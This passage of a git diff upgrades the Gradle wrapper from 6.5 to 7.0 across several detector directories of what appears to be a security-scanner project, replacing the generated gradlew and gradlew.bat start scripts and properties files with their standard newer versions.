-distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/argoworkflow/gradlew b/google/detectors/exposedui/argoworkflow/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/argoworkflow/gradlew +++ b/google/detectors/exposedui/argoworkflow/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/argoworkflow/gradlew.bat b/google/detectors/exposedui/argoworkflow/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/argoworkflow/gradlew.bat +++ b/google/detectors/exposedui/argoworkflow/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/docker/gradlew b/google/detectors/exposedui/docker/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/docker/gradlew +++ b/google/detectors/exposedui/docker/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/docker/gradlew.bat b/google/detectors/exposedui/docker/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/docker/gradlew.bat +++ b/google/detectors/exposedui/docker/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/drupal_install/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/drupal_install/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/google/detectors/exposedui/drupal_install/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/drupal_install/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git 